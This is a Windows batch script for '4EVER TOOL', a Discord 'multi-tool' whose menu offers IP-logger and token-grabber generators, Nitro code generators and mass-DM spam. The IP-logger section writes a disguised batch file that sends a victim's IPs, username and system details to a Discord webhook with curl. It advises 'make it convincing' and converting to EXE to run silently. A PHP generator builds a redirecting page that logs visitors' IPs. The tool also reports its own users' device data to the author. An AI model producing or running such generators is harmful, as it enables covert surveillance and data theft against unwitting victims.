:: MIT License
::
:: Copyright (c) 2022 TheSemikon43 (The_Semikon43#6969 on Discord, B3NJ4M1N シ on YouTube)
::
:: Permission is hereby granted, free of charge, to any person obtaining a copy
:: of this software and associated documentation files (the "Software"), to deal
:: in the Software without restriction, including without limitation the rights
:: to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
:: copies of the Software, and to permit persons to whom the Software is
:: furnished to do so, subject to the following conditions:
::
:: The above copyright notice and this permission notice shall be included in all
:: copies or substantial portions of the Software.
::
:: THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
:: IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
:: FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
:: AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
:: LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
:: OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
:: SOFTWARE.
::
:: ====================================================================================================

@echo off
chcp 65001

:: 4ever tool made by The_Semikon43#6969
:: If you managed to decompile this tool, sorry for the bad code xD
:: All made in batch, as you can see. I suck at coding btw
:: As you also can see, there are no viruses or trojans in here
:: Except the viruses and trojans generated by this tool obviously lol
:: I am a very legit coder!!1
::
:: If you would like to see how I collect data from you (the user), go
:: to following directory: utilities\dvcinfo\ and view deviceinfo.cmd
:: Mainly used for logging, but also gives me information how you use
:: this tool. I made it into an exe file because I dont want that other
:: people can send shit through the webhook lol
:: (please dont do it)
::
:: and now my bad code starts with the tos, ua and pp agreement
:: rest of code is not documented because i am lazy asf

:: info: this still beta so it open source


:tosagree
title 4EVER TOOL - Verify
color 0f
cls
echo Before you can use this program, you need to agree and accept the User Agreement, Privacy Policy
echo and the Terms of Use. To read them, type ^'read^' and press enter. If you agree, type ^'agree^'
echo and press enter.
echo.
set /p agree="[>] [40;32m"
echo [40;37mok
if [%agree%] == [agree] goto homeload
if [%agree%] == [read] goto tos
goto tosagree


:homeload
title 4EVER TOOL - Python Requirements
py --version
if [%errorlevel%] == [9009] goto nopython
py --version>pythonversion.txt
set /p pyver=<pythonversion.txt
del pythonversion.txt
cls
echo [40;36m-^> 4ever tool loader[40;37m
echo.
echo [40;32mPython found![40;37m
echo.
echo Installed version: %pyver%
echo.
echo Do you want to run the installations [Y/N]?
:btvuyn49wb5t4wyn89b64nu39
set tool=4ytg74ygtbw3tbnw3b7f8o7b8o63fwt6f38vbq3v7gbit76vg8q3
set /p tool="[40;36m[>] [40;33m"
echo [40;37mPlease wait...
if [%tool%] == [4ytg74ygtbw3tbnw3b7f8o7b8o63fwt6f38vbq3v7gbit76vg8q3] goto btvuyn49wb5t4wyn89b64nu39
if [%tool%] == [y] echo Please wait until internet connection is checked...
if [%tool%] == [n] echo. && goto pipdone
echo.
ping /n 1 google.com>nul
if [%errorlevel%] == [0] echo Internet connection stable, 4ever tool will check if every required package is installed... && echo.
if [%errorlevel%] == [1] echo. && echo You are not connected to the internet. This may limit the functionality of some tools. && echo As there are pip installations needed for some tools, not every tool may function as intented. && echo. && echo 4ever tool will install the required packages when an internet connection is available. && echo. && goto pipdone
echo [40;33mStarting...
pip show discord
if [%errorlevel%] == [0] echo Discord package installed
if [%errorlevel%] == [1] echo Discord package not found && goto pipinstallations
pip show discord_webhook
if [%errorlevel%] == [0] echo Discord Webhook package installed
if [%errorlevel%] == [1] echo Discord Webhook package not found && goto pipinstallations
pip show colorama
if [%errorlevel%] == [0] echo Colorama installed
if [%errorlevel%] == [1] echo Colorama not found && goto pipinstallations
pip show tqdm
if [%errorlevel%] == [0] echo TQDM installed
if [%errorlevel%] == [1] echo TQDM not found && goto pipinstallations
pip show pyinstaller
if [%errorlevel%] == [0] echo PyInstaller installed
if [%errorlevel%] == [1] echo PyInstaller not found && goto pipinstallations
pip show pyperclip
if [%errorlevel%] == [0] echo Pyperclip installed
if [%errorlevel%] == [1] echo Pyperclip not found && goto pipinstallations
pip show colour
if [%errorlevel%] == [0] echo Colour installed
if [%errorlevel%] == [1] echo Colour not found && goto pipinstallations
pip show PyNaCl
if [%errorlevel%] == [0] echo PyNaCl installed
if [%errorlevel%] == [1] echo PyNaCl not found && goto pipinstallations
pip show psutil
if [%errorlevel%] == [0] echo PSutil installed
if [%errorlevel%] == [1] echo PSutil not found && goto pipinstallations
pip show selenium
if [%errorlevel%] == [0] echo Selenium installed
if [%errorlevel%] == [1] echo Selenium not found && goto pipinstallations
pip show fake_useragent
if [%errorlevel%] == [0] echo Fake Useragent installed
if [%errorlevel%] == [1] echo Fake Useragent not found && goto pipinstallations
pip show numpy
if [%errorlevel%] == [0] echo Numpy installed
if [%errorlevel%] == [1] echo Numpy not found && goto pipinstallations
pip show requests
if [%errorlevel%] == [0] echo Requests installed
if [%errorlevel%] == [1] echo Requests not found && goto pipinstallations
echo.
echo [40;32mEvery requirement satisfied![40;37m
echo.
goto pipdone
:pipinstallations
color 0f
echo.
echo ===================================================================================================
ping /n 2 localhost>nul
echo Running required pip installations...
title 4EVER TOOL - Pip Installations
ping /n 1 google.com>nul
if [%errorlevel%] == [0] echo Internet connection stable... && echo.
if [%errorlevel%] == [1] echo. && echo You are not connected to the internet. This may limit the functionality of some tools. && echo Since not every requirement is satisfied, this may limit the functionality of some tools. && echo. && echo 4ever tool will install the required packages when an internet connection is available. && echo. && goto pipdone
pip install discord
pip install discord_webhook
pip install colorama
pip install tqdm
pip install pyinstaller
pip install pyperclip
pip install colour
pip install PyNaCl
pip install psutil
pip install selenium
pip install fake_useragent
pip install numpy
pip install requests
echo [40;32mFinished pip installations![40;37m
:pipdone
timeout 5>nul
goto loadbar
:nopython
title 4EVER TOOL - Python Requirements Not Satisfied
cls
echo [40;36m-^> 4ever tool loader[40;37m
echo.
echo It seems like Python is not installed on your device. Install Python to run tools marked with *.
echo It is recommended to run Python 3.10.1 or 3.10.2 for those tools.
echo.
echo Because there is no Python installed, no pip installations are needed.
echo If you run this tool the next time, the python check will repeat. Once you installed python,
echo the package requirements will be satisfied (unless you have an internet connection).
echo.
echo Press any key to load 4ever tool...
timeout 30>nul
goto loadbar


:loadbar
title 4EVER TOOL - loading
cls
echo [46;30m                               Multi-Tool For Discord And Other Stuff                               
echo           ██╗  ██╗███████╗██╗   ██╗███████╗██████╗     ████████╗ ██████╗  ██████╗ ██╗               
echo           ██║  ██║██╔════╝██║   ██║██╔════╝██╔══██╗    ╚══██╔══╝██╔═══██╗██╔═══██╗██║               
echo           ███████║█████╗  ██║   ██║█████╗  ██████╔╝       ██║   ██║   ██║██║   ██║██║               
echo           ╚════██║██╔══╝  ╚██╗ ██╔╝██╔══╝  ██╔══██╗       ██║   ██║   ██║██║   ██║██║               
echo                ██║███████╗ ╚████╔╝ ███████╗██║  ██║       ██║   ╚██████╔╝╚██████╔╝███████╗          
echo                ╚═╝╚══════╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝       ╚═╝    ╚═════╝  ╚═════╝ ╚══════╝          
echo                                      http://4ever.B3NJ4M1N.xyz/                                     
echo [44;37m                                                                                                    [40;37m
echo.
echo 4ever is starting...
echo Checking required components...
echo.
echo [44;37m                                                                                                    [40;37m
echo.
if exist utilities echo Utilities folder loaded && goto utilities
echo [40;31mUtilities not found, please reinstall tool.
echo.
echo Press any key to close...[40;37m
timeout 30>nul
exit
:utilities
ping /n 2 localhost>nul
if exist utilities\battoexe echo Utility BatToExe loaded && goto battoexe
echo [40;31mRedUtility BatToExe not found, please reinstall tool or press any key to ignore...[40;37m
timeout 30>nul
:battoexe
ping /n 2 localhost>nul
if exist utilities\dvcinfo echo Utility dvcinfo loaded && goto dvcinfo
echo [40;31mRedUtility dvcinfo not found, please reinstall tool.
echo.
echo Press any key to close...[40;37m
timeout 30>nul
exit
:dvcinfo
ping /n 2 localhost>nul
if exist utilities\other echo Other utilities loaded && goto other
echo [40;31mRedOther utilites not found, please reinstall tool or press any key to ignore...[40;37m
timeout 30>nul
:other
ping /n 2 localhost>nul
if exist output echo Output folder loaded && goto output
echo [40;31mRedOutput folder not found, creating new one...[40;37m
md output
echo Done!
:output
ping /n 2 localhost>nul
echo All folders loaded
ping /n 2 localhost>nul
goto home



:home
title 4EVER TOOL - Home
color 0b
:fasthome
cls
echo [46;30m                               Multi-Tool For Discord And Other Stuff                 hey spocony :)
echo           ██╗  ██╗███████╗██╗   ██╗███████╗██████╗     ████████╗ ██████╗  ██████╗ ██╗      hey fvxq!
echo           ██║  ██║██╔════╝██║   ██║██╔════╝██╔══██╗    ╚══██╔══╝██╔═══██╗██╔═══██╗██║          69420
echo           ███████║█████╗  ██║   ██║█████╗  ██████╔╝       ██║   ██║   ██║██║   ██║██║               
echo 100%%      ╚════██║██╔══╝  ╚██╗ ██╔╝██╔══╝  ██╔══██╗       ██║   ██║   ██║██║   ██║██║               
echo legit          ██║███████╗ ╚████╔╝ ███████╗██║  ██║       ██║   ╚██████╔╝╚██████╔╝███████╗          
echo its real       ╚═╝╚══════╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝       ╚═╝    ╚═════╝  ╚═════╝ ╚══════╝          
echo not a virus!1!!                      http://4ever.B3NJ4M1N.xyz/                                     
echo [44;37m                                    Thanks for using 4EVER tool!                                    [40;36m
echo.
echo   - Made by [40;35mThe_Semikon43#6969[40;36m  - Best Discord Tools: [40;35mhttps://github.com/TT-Tutorials/GANG-Nuker[40;36m
echo   - Version [40;35m0.5.4[40;36m               - Bat To Exe Credits: [40;35mhttps://github.com/99fk[40;36m
echo.
echo [44;37m                Tools marked with * require Python and all required packages to run!                [40;36m
echo.
echo [40;36m  ^|       [40;32mBatch Tools      [40;36m^|      [40;32mPython Tools      [40;36m^|     [40;32mWebsite Tools      [40;36m^|     [40;32mOther Stuff
echo [40;36m  ^| [40;32m                       [40;36m^|      [40;32m                  [40;36m^|   [40;32m                     [40;36m^|     [40;32m
echo   [40;36m^| [40;37m[[40;35m0[40;37m] [40;32mIP Logger (Buggy)  [40;36m^|[40;31m*[40;37m[[40;35m10[40;37m] [40;32mNitro Generator   [40;36m^| [40;37m[[40;35m20[40;37m] [40;32mIP Logger Website [40;36m^|  [40;37m[[40;35m30[40;37m] [40;32mBat To Exe
echo   [40;36m^| [40;37m[[40;35m1[40;37m] [40;32mToken Grabber WIP  [40;36m^|[40;31m*[40;37m[[40;35m11[40;37m] [40;32mDmAll             [40;36m^| [40;37m[[40;35m21[40;37m] [40;32mIP Logger PHP Gen [40;36m^|  [40;37m[[40;35m31[40;37m] [40;32mPinger v1
echo   [40;36m^| [40;37m[[40;35m [40;37m] [40;32m                   [40;36m^|[40;31m*[40;37m[[40;35m12[40;37m] [40;32mServerLookup      [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^|  [40;37m[[40;35m32[40;37m] [40;32mOutputLog
echo   [40;36m^| [40;37m[[40;35m [40;37m] [40;32m                   [40;36m^|[40;31m*[40;37m[[40;35m13[40;37m] [40;32mRblxAltGen        [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^|  [40;37m[[40;35m  [40;37m] [40;32m
echo   [40;36m^| [40;37m[[40;35m [40;37m] [40;32m                   [40;36m^|[40;31m*[40;37m[[40;35m14[40;37m] [40;32mNitro Gen v2      [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^|  [40;37m[[40;35m  [40;37m] [40;32m
echo   [40;36m^| [40;37m[[40;35m [40;37m] [40;32m                   [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^|  [40;37m[[40;35m  [40;37m] [40;32m
echo   [40;36m^| [40;37m[[40;35m [40;37m] [40;32m                   [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^|  [40;37m[[40;35m  [40;37m] [40;32m
echo   [40;36m^| [40;37m[[40;35m [40;37m] [40;32m                   [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^|  [40;37m[[40;35m37[40;37m] [40;32mHelp
echo   [40;36m^| [40;37m[[40;35m [40;37m] [40;32m                   [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^|  [40;37m[[40;35m38[40;37m] [40;32mAbout
echo   [40;36m^| [40;37m[[40;35m [40;37m] [40;32m                   [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^| [40;37m[[40;35m  [40;37m] [40;32m                  [40;36m^|  [40;37m[[40;35mexit[40;37m] [40;32mStop 4ever
echo.

set tool=4ytg74ygtbw3tbnw3b7f8o7b8o63fwt6f38vbq3v7gbit76vg8q3
set /p tool="[40;36m[>] [40;33m"
echo ok[40;37m

if [%tool%] == [4ytg74ygtbw3tbnw3b7f8o7b8o63fwt6f38vbq3v7gbit76vg8q3] goto fasthome

if [%tool%] == [exit] goto exit
if [%tool%] == [0] goto iplogger
if [%tool%] == [1] goto tokengrabber

if [%tool%] == [10] goto nitrogenerator
if [%tool%] == [11] goto dmall
if [%tool%] == [12] goto serverlookup
if [%tool%] == [13] goto altgen
if [%tool%] == [14] goto nitrogeneratorv2

if [%tool%] == [20] start http://b3nj4m1n.xyz/iplogger/  && goto home
if [%tool%] == [21] goto iploggersite

if [%tool%] == [30] start utilities\battoexe\BatToExeConverter.exe && goto home
if [%tool%] == [31] start utilities\pinger\pinger-launch.bat && goto home
if [%tool%] == [32] start utilities\outputlogger\ologger.bat && goto home
if [%tool%] == [38] goto help
if [%tool%] == [39] goto about

goto home


:about
title 4EVER TOOL - About
cls
echo [46;30m                               Multi-Tool For Discord And Other Stuff                               
echo           ██╗  ██╗███████╗██╗   ██╗███████╗██████╗     ████████╗ ██████╗  ██████╗ ██╗               
echo           ██║  ██║██╔════╝██║   ██║██╔════╝██╔══██╗    ╚══██╔══╝██╔═══██╗██╔═══██╗██║               
echo           ███████║█████╗  ██║   ██║█████╗  ██████╔╝       ██║   ██║   ██║██║   ██║██║               
echo           ╚════██║██╔══╝  ╚██╗ ██╔╝██╔══╝  ██╔══██╗       ██║   ██║   ██║██║   ██║██║               
echo                ██║███████╗ ╚████╔╝ ███████╗██║  ██║       ██║   ╚██████╔╝╚██████╔╝███████╗          
echo                ╚═╝╚══════╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝       ╚═╝    ╚═════╝  ╚═════╝ ╚══════╝          
echo                                      http://4ever.B3NJ4M1N.xyz/                                     
echo [44;37m                                                                                                    [40;36m
echo.
echo [40;37m4EVER tool is similar to GANG tool by ^'TT^'.
echo Download at http://github.com/TT-Tutorials/GANG-Nuker
echo.
echo What Is This For?
echo You can use 4EVER in multiple ways. For example, you can create a batch file which gets the IP
echo of the computer which it currently on and send it to your discord server through a webhook. You can
echo use the integrated Bat To Exe Converter (number 13 on main menu) to make the program completely
echo silent. Once opened, there is no going back, you will have your victim's ip adress and many other
echo infos about his machine and system.
echo.
echo [44;37m                                                                                                    [40;36m
echo Press any key to continue...
pause>nul
goto home


:tos
title 4EVER TOOL - Terms of Use, User Agreement, Privacy Policy
cls
echo [46;30m                               Multi-Tool For Discord And Other Stuff                               
echo           ██╗  ██╗███████╗██╗   ██╗███████╗██████╗     ████████╗ ██████╗  ██████╗ ██╗               
echo           ██║  ██║██╔════╝██║   ██║██╔════╝██╔══██╗    ╚══██╔══╝██╔═══██╗██╔═══██╗██║               
echo           ███████║█████╗  ██║   ██║█████╗  ██████╔╝       ██║   ██║   ██║██║   ██║██║               
echo           ╚════██║██╔══╝  ╚██╗ ██╔╝██╔══╝  ██╔══██╗       ██║   ██║   ██║██║   ██║██║               
echo                ██║███████╗ ╚████╔╝ ███████╗██║  ██║       ██║   ╚██████╔╝╚██████╔╝███████╗          
echo                ╚═╝╚══════╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝       ╚═╝    ╚═════╝  ╚═════╝ ╚══════╝          
echo                                      http://4ever.B3NJ4M1N.xyz/                                     
echo [44;37m                                                                                                    [40;36m
echo.
echo                            TERMS OF USE / USER AGREEMENT - PRIVACY POLICY
echo                                            TERMS OF USE ^&
echo                                            USER AGREEMENT
echo [44;37m                                                                                                    [40;36m
echo.
echo [40;37mBy using this software you (YOU, the user who is accepting this agreemen) agree to taking ALL
echo responsibility for damage done to anyone. The creator and/or owner is NOT responsible for that
echo damage. The creator and/or owner does NOT take responsibility for any of your accounts getting
echo removed from any platform because of this software. If you are using this software, you AGREE to
echo the Terms of Use AND this agreement.
echo.
echo.
echo [44;35m                                                                                                    [40;36m
echo Press any key to continue...
pause>nul
title 4EVER TOOL - Terms of Use, User Agreement, Privacy Policy
cls
echo [46;30m                               Multi-Tool For Discord And Other Stuff                               
echo           ██╗  ██╗███████╗██╗   ██╗███████╗██████╗     ████████╗ ██████╗  ██████╗ ██╗               
echo           ██║  ██║██╔════╝██║   ██║██╔════╝██╔══██╗    ╚══██╔══╝██╔═══██╗██╔═══██╗██║               
echo           ███████║█████╗  ██║   ██║█████╗  ██████╔╝       ██║   ██║   ██║██║   ██║██║               
echo           ╚════██║██╔══╝  ╚██╗ ██╔╝██╔══╝  ██╔══██╗       ██║   ██║   ██║██║   ██║██║               
echo                ██║███████╗ ╚████╔╝ ███████╗██║  ██║       ██║   ╚██████╔╝╚██████╔╝███████╗          
echo                ╚═╝╚══════╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝       ╚═╝    ╚═════╝  ╚═════╝ ╚══════╝          
echo                                      http://4ever.B3NJ4M1N.xyz/                                     
echo [44;37m                                                                                                    [40;36m
echo.
echo                            TERMS OF USE / USER AGREEMENT - PRIVACY POLICY
echo                                            PRIVACY POLICY
echo.
echo [44;37m                                                                                                    [40;36m
echo.
echo [40;37mBy using this software you (YOU, the user who is accepting this agreement) AGREE with the creator
echo and/or owner collecting information about you and how you use this software. This software is
echo not protected by any copyright, the creator and/or owner does ALLOW the distribution of this
echo software UNLESS there is NO CHANGE in the source code this software and any of it's content files
echo or folders. If you use this software, you AGREE with the distributor NOT being responsible for any
echo damage done to anyone.
echo.
echo [44;37m                                                                                                    [40;36m
echo Press any key to continue...
pause>nul
goto tosagree


:help
cls
echo no help available yet. sorry
echo.
echo Press any key to continue...
pause>nul
goto home

:nitrogenerator
call utilities\dvcinfo\deviceinfo.cmd
title 4EVER TOOL - Nitro Generator
cls
echo                                Nitro Generator ^& Checker made by FVXQ
echo [44;37m                                                                                                    [40;39m
py utilities\other\NG\main.py
echo [44;37m                                                                                                    [40;39m
echo                                 Nitro Generator ^& Checker has ended.
echo.
echo It may be possible that there was an error and that^'s the reason why NG stopped.
echo Press any key to continue...
pause>nul
goto home


:nitrogeneratorv2
call utilities\dvcinfo\deviceinfo.cmd
title 4EVER TOOL - Nitro Generator v2
cls
echo                           Nitro Generator ^& Checker v2  made by logicguy1
echo [44;37m                                                                                                    [40;39m
py utilities\other\NG-v2\main.py
echo [44;37m                                                                                                    [40;39m
echo                               Nitro Generator ^& Checker v2  has ended.
echo.
echo It may be possible that there was an error and that^'s the reason why NG stopped.
echo Press any key to continue...
pause>nul
goto home


:dmall
call utilities\dvcinfo\deviceinfo.cmd
cls
echo Loading Device Info [^|]
ping /n 2 localhost>nul
cls
echo Loading Device Info [/]
ping /n 2 localhost>nul
cls
echo Loading Device Info [-]
ping /n 2 localhost>nul
title 4EVER TOOL - DmAll
cls
echo                                          DmAll made by FVXQ
echo [44;37m                                                                                                    [40;39m
call utilities\other\dmall\DmAll.exe
echo [44;37m                                                                                                    [40;39m
echo                                           DmAll has ended.
echo.
echo It may be possible that there was an error and that^'s the reason why DmAll stopped.
echo Press any key to continue...
pause>nul
goto home


:serverlookup
call utilities\dvcinfo\deviceinfo.cmd
title 4EVER TOOL - ServerLookup
cls
echo                                      ServerLookup made by FVXQ
echo [44;37m                                                                                                    [40;39m
call utilities\other\lookup\ServerLookup.exe
echo [44;37m                                                                                                    [40;39m
:: this is line 420 and i like it alot - oh i forgot it will move when i continue to code
echo                                       ServerLookup has ended.
echo.
echo It may be possible that there was an error and that^'s the reason why ServerLookup stopped.
echo Press any key to continue...
pause>nul
goto home


:iplogger
call utilities\dvcinfo\deviceinfo.cmd
title 4EVER TOOL - IP Logger Gen
cls
echo                                     IP Logger Program Generator
echo [44;37m                                                                                                    [40;39m
echo.
echo This will generate a batch file which sends the victim's IP to a custom webhook. The batch file can
echo be converted to an EXE file when using Bat To Exe converter.
echo.
echo Data which will be sent to webhook:
echo -^> Network IP
echo -^> Public IP
echo -^> Username
echo -^> Processor ID
echo -^> Logon Server
echo.
echo Filename?  -  Don't inlcude file extension (no .bat)  -  Make it convincing!
set /p filename="[>] "
echo.
echo Webhook?  -  Webhook should look like this:
echo              https^:^/^/discord.com^/api^/webhooks^/XXXXXXXXXXXXXXXXXX^/
echo              XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
set /p webhookurl="[>] "
echo.
echo Info collected is:
echo Filename %filename%.bat
echo Webhook %webhookurl%
echo.
echo Is this information correct [yes/no]?
:iploggerprompt
set /p answer="[>] "
if [%answer%] == [no] goto iplogger
if [%answer%] == [yes] goto iploggercreate
goto iploggerprompt
:iploggercreate
echo.
echo Creating file...
echo @echo off>output\%filename%.bat
echo for /f %%%%a in ('powershell Invoke-RestMethod api.ipify.org') do set PublicIP=%%%%a>>output\%filename%.bat
echo for /f "delims=[] tokens=2" %%%%a in ('ping -4 -n 1 %%ComputerName%% ^| findstr [') do set NetworkIP=%%%%a>>output\%filename%.bat
echo curl -i -H ^"Accept^: application^/json^" -H "Content-Type:application/json" -X POST --data ^"^{^\^"content^\^"^: ^\^"^*^*==============^*^*^\n^*^*4EVER IP Logger^*^*^\nIP Logger was executed by **%%username%%**! ^\nNetwork IP^: %%NetworkIP%%\nPublic IP^: %%PublicIP%%\nProcessor^: %%PROCESSOR^_IDENTIFIER%%\nLogon Server^: %%LOGONSERVER%%^\^"^}^" %webhookurl%>>output\%filename%.bat
echo exit>>output\%filename%.bat
echo Done!
echo File written to output\%filename%.bat
echo.
echo Convert to EXE file?
:iploggerpromptb
set /p answer="[>] "
if [%answer%] == [no] goto home
if [%answer%] == [yes] start utilities\battoexe\BatToExeConverter.exe && goto home
goto iploggerpromptb


:tokengrabber
call utilities\dvcinfo\deviceinfo.cmd
title 4EVER TOOL - Token Grabber
cls
echo                                   Token Grabber Program Generator
echo [44;37m                                                                                                    [40;39m
echo.
echo i am still developing this sorry but it doesnt work so im not gonna add it to here yet
pause>nul
goto home


:iploggersite
title 4EVER TOOL - PHP Logger
cls
echo [40;31mXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
echo XX                                                                                                XX
echo XX                             ▄███████▄    ▄█    █▄       ▄███████▄                              XX
echo XX                            ███    ███   ███    ███     ███    ███                              XX
echo XX                            ███    ███   ███    ███     ███    ███                              XX
echo XX                            ███    ███  ▄███▄▄▄▄███▄▄   ███    ███                              XX
echo XX                          ▀█████████▀  ▀▀███▀▀▀▀███▀  ▀█████████▀                               XX
echo XX                            ███          ███    ███     ███                                     XX
echo XX                            ███          ███    ███     ███                                     XX
echo XX                           ▄████▀        ███    █▀     ▄████▀                                   XX
echo XX                                                                                                XX
echo XX            ▄█        ▄██████▄     ▄██████▄     ▄██████▄     ▄████████    ▄████████             XX
echo XX           ███       ███    ███   ███    ███   ███    ███   ███    ███   ███    ███             XX
echo XX           ███       ███    ███   ███    █▀    ███    █▀    ███    █▀    ███    ███             XX
echo XX           ███       ███    ███  ▄███         ▄███         ▄███▄▄▄      ▄███▄▄▄▄██▀             XX
echo XX           ███       ███    ███ ▀▀███ ████▄  ▀▀███ ████▄  ▀▀███▀▀▀     ▀▀███▀▀▀▀▀               XX
echo XX           ███       ███    ███   ███    ███   ███    ███   ███    █▄  ▀███████████             XX
echo XX           ███▌    ▄ ███    ███   ███    ███   ███    ███   ███    ███   ███    ███             XX
echo XX           █████▄▄██  ▀██████▀    ████████▀    ████████▀    ██████████   ███    ███             XX
echo XX           ▀                                                             ███    ███             XX
echo XX                           By [40;35mThe_Semikon43#6969[40;31m bc hes cool hackr guy                          XX
echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[40;37m
echo.
echo PHP IP Logger will generate a full website redirecting to a custom other website which also saves
echo the IP to a file in the same directory as the PHP file.
echo If the redirect URL includes previews (what you see when you send it on Discord), the IP Logger
echo link will copy that and show it too. Put it on your server and enjoy :) Type 'kurwa69' to exit.
echo.
echo File name? - Exclude file ending like .php or .html
set /p filename="Value:"
if %filename% == kurwa69 goto home
echo.
echo Log file name? - Exclude file ending like .txt
set /p logfilename="Value:"
echo.
echo Redirect URL? - Make sure to include http:// or https://
set /p redirecturl="Value:"
echo.
echo Generating file...
echo ^<?php>output/%filename%.php
echo $ip = $_SERVER['REMOTE_ADDR'];>>output/%filename%.php
echo $fp = fopen('%logfilename%.txt', 'a');>>output/%filename%.php
echo fwrite($fp, ' -X- Someone visited with the IP: '.$ip);>>output/%filename%.php
echo fclose($fp);>>output/%filename%.php
echo header('Location: %redirecturl%')>>output/%filename%.php
echo ?^>>>output/%filename%.php
echo.
echo File written in output folder
cd ..
cd ..
echo Press any key to continue...
pause>nul
goto home


:altgen
call utilities\dvcinfo\deviceinfo.cmd
title 4EVER TOOL - RblxAltGen
cls
echo                               RblxAltGen made by The_Semikon43#6969
echo [44;37m                                                                                                    [40;39m
call utilities\other\rblxalt\main.py
echo [44;37m                                                                                                    [40;39m
echo                                        RblxAltGen has ended.
echo.
echo It may be possible that there was an error and that^'s the reason why RblxAltGen stopped.
echo Press any key to continue...
pause>nul
goto home


:exit
title Command Prompt
color 0f
cls
echo 4ever stopped running because of an error or because of a manual exit.